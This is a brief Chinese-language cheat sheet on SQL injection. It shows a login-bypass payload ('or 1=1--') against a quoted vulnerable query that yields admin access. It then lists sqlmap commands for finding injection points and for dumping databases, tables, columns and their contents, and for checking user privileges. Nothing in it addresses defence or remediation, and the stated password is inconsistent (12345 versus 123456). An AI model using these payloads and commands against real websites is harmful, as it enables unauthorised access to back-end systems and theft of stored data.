万能密码
网站后台的数据查询语句为:select*from member where username='&user' and passwd='&pwd'
- 正常使用者帐号是admin,密码12345,那么SQL语句就变为:select*from member where username='admin'and passwd='123456'
- 输入用户名admin(也可任意输入),密码abc'or 1=1--(前面的abc可任意输入),SQL语句为:select*from member where username='admin' and passwd='abc' or 1=1,则攻击者可以轻松成功登陆admin账号,进入Web后台
sqlmap
判断注入:python sqlmap.py -u "url"
- post型:--data(--forms)
- cookie型:--cookie
获取数据库:python sqlmap.py-u“url”--dbs
获取表名:python sqlmap.py -u“url"--tables -D db name
获取字段名:python sqlmap.py-u“url”--columns -T table name -D dp name
获取字段内容:python sqlmap.py -u"url" -C column_name --dump -T table_name -D db name
其他:
- 判断用户:--is-dba
- 获取用户:--user
- 判断权限:--privileges